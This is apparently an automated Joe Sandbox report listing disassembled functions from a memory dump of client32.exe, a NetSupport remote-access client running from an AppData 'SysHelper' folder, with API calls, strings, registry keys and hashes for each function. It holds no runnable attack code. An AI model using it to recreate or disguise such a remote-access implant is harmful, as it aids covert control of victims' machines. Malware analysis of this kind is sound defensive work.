Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CreateEventException@8Throw_memsetstd::exception::exceptionwsprintf
String ID: Advapi32.dll$Wtsapi32.dll
API String ID: 1187064156-2390547818
Opcode ID: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
Instruction ID: bbbd634f828a37cff571ede067cab351b0e944a9bc0c67eb03fa8c0f48524c6c
Opcode Fuzzy Hash: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
Instruction Fuzzy Hash: 594114B5D09B449AC361CF6A8980BDAFBF8EFA9204F00494ED5AE93210D7787500CF51

Function 11135BC0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 11135BEA
GetTickCount.KERNEL32 ref: 11135BF1

Strings

Client, xrefs: 11135C15
DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 11135CAC
AutoICFConfig, xrefs: 11135C10
DoICFConfig() OK, xrefs: 11135C96

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
API String ID: 536389180-1512301160
Opcode ID: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
Instruction ID: e3d06188695ac204c7c53c5cb05177b21b7d5d04c4fed9e193d22ae282c8029d
Opcode Fuzzy Hash: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
Instruction Fuzzy Hash: D021E770A213A64EFF938AE5DD84765FE895780FAEF004139D420956CCE7749480DF56

Function 68599C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON

Download Yara Rule

APIs

send.WSOCK32(?,?,?,00000000), ref: 68599C93
timeGetTime.WINMM(?,?,?,00000000), ref: 68599CD0
Sleep.KERNEL32(00000000), ref: 68599CDE
LeaveCriticalSection.KERNEL32(?), ref: 68599D4F
InterlockedIncrement.KERNEL32(?), ref: 68599D72

Strings

3', xrefs: 68599CB2

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
String ID: 3'
API String ID: 77915721-280543908
Opcode ID: 442c41e9bc28b70ce4ebe149dcb238cc43588a35f0f8e0baf2466afce3e96441
Instruction ID: 236607c0a8a5709804ead984073072827bcf7aa643f65f3bb03ea8ca8f484ff1
Opcode Fuzzy Hash: 442c41e9bc28b70ce4ebe149dcb238cc43588a35f0f8e0baf2466afce3e96441
Instruction Fuzzy Hash: 63216D75A042288FDF20DF64CC88B9AB7B8AF45314F4542D5E91D9B281CA30ED84CF91

Function 110259E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 110259F6
K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11025A12
GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025A26
SetLastError.KERNEL32(00000078), ref: 11025A49

Strings

GetModuleFileNameExA, xrefs: 11025A20
GetProcessImageFileNameA, xrefs: 110259F0

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorFileImageLastNameProcess
String ID: GetModuleFileNameExA$GetProcessImageFileNameA
API String ID: 4186647306-532032230
Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
Instruction ID: 68c8d787ea85bb7251c32f91647a1931aca61929af41b034d7bc2fd00ab8f334
Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
Instruction Fuzzy Hash: 46018036A41315AFD321DF69EC84F8BB7E8EB89765F10452AF986D7600D631E800CBB4

Function 1110C2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321

Strings

..\ctl32\Refcount.cpp, xrefs: 1110C2FB
hThread, xrefs: 1110C300

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 3360349984-1136101629
Opcode ID: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
Instruction ID: a3115959ccdc6595f724f67194249590caf2e9fcdd86f69c2c7dc21ad5a21c7d
Opcode Fuzzy Hash: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
Instruction Fuzzy Hash: 2D01D4367403126FE7208E99DC89F4BBBA8EB54765F108128FA15876C0DA70E404CBA0

Function 110313B0 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110313F7

Strings

_HW, xrefs: 110313C0
_HF, xrefs: 110313D8, 110313DD
226546, xrefs: 110313DE
_SW, xrefs: 110313CC
%s%s%s.bin, xrefs: 110313F1

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s%s%s.bin$226546$_HF$_HW$_SW
API String ID: 2111968516-1464289686
Opcode ID: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
Instruction ID: fca8ef28a5c1b47a0d785ddae3209236aee7f502678e08843e7b704547fe2850
Opcode Fuzzy Hash: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
Instruction Fuzzy Hash: D5E09BA0D2060C5FF3005159AC01BAFBBAC1F4434AF80C0D0FEE9A6A82E974944086D5

Function 110FFCC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFD13
GetStockObject.GDI32(00000004), ref: 110FFD6B
RegisterClassA.USER32(?), ref: 110FFD7F
CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 110FFDBC

Strings

NSMDesktopWnd, xrefs: 110FFCF9, 110FFD78, 110FFDB6

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomClassCreateGlobalObjectRegisterStockWindow
String ID: NSMDesktopWnd
API String ID: 2669163067-206650970
Opcode ID: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
Instruction ID: e76810456149084fb848040635d8e5dd78421bccde4647aa26b9c0cc0d967c72
Opcode Fuzzy Hash: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
Instruction Fuzzy Hash: 0231F7B5D01259AFCB41DFA9D880A9EFBF8FB09314F50862EE569E3240E7345940CF95

Function 11139340 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(00000000,00000000,TermUI...), ref: 111393AA
KillTimer.USER32(00000000,00007F30,TermUI...), ref: 111393C3
FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113943B
FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 11139453

Strings

TermUI, xrefs: 11139342

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeKillLibraryTimer
String ID: TermUI
API String ID: 2006562601-4085834059
Opcode ID: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
Instruction ID: bc9711c706b9d41bf1b1aa53e8d725085e588c5fb78ea17b568d689d6d6e9679
Opcode Fuzzy Hash: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
Instruction Fuzzy Hash: F03158B16135349BD202DFE9CDC0A7AFBAAABC5B1C711402AF4258720CF770A841CF92

Function 111419A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
RegCloseKey.ADVAPI32(?), ref: 11141A74

Strings

SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 111419F0
ForceRTL, xrefs: 11141A33
SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 111419D7, 11141A0E

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
Instruction ID: a36c5406095c56a7772cd5309942c79e158504ca27ae800c645d53ad84447c87
Opcode Fuzzy Hash: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
Instruction Fuzzy Hash: A921CD75F0022A5BE710DAA8CD80F9AF7B89B45714F2045AAD95DF3140E731BE458B71

Function 1110E460 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 1110E3C0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
Part of subcall function 1110E3C0: __wsplitpath.LIBCMT ref: 1110E405
Part of subcall function 1110E3C0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439

GetComputerNameA.KERNEL32(?,?), ref: 1110E508

Strings

\Registry\Machine\SOFTWARE\Classes\N%x, xrefs: 1110E4B0
ACM, xrefs: 1110E4C2
, xrefs: 1110E501
\Registry\Machine\SOFTWARE\Classes\N%x.%s, xrefs: 1110E517

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
API String ID: 806825551-1858614750
Opcode ID: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
Instruction ID: 783a1893864e797c111924e05002c86c7d14abf0d26c6a4cafca36759f9e265b
Opcode Fuzzy Hash: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
Instruction Fuzzy Hash: 4E214936E052A616D301CE369D807BFFFBADF86614F054978EC51D7102F626E5048751

Function 11017520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000002F4,000000FF), ref: 1101755C
CoInitialize.OLE32(00000000), ref: 11017565
CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0

Strings

Win32_ComputerSystem, xrefs: 1101757D
PCSystemTypeEx, xrefs: 1101759C

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleUninitializeWait
String ID: PCSystemTypeEx$Win32_ComputerSystem
API String ID: 2994556011-578995875
Opcode ID: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
Instruction ID: 2dfd674cbcced21787933601e0fbf0765c8f89b6bf193c9c24077654eb832309
Opcode Fuzzy Hash: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
Instruction Fuzzy Hash: D62129B1E006669BDF11CBA0CC44B6EB7E89F45358F1000B5FC58DA2C8FAB8E940D791

Function 11140870 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 11140290: GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
Part of subcall function 11140290: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SysHelper\client32.exe,00000104,?,111404E3,?), ref: 111402B9

WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408C5
ResetEvent.KERNEL32(000000E0), ref: 111408D9
SetEvent.KERNEL32(000000E0), ref: 111408EF
WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408FE

Strings

MiniDump, xrefs: 11140877

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

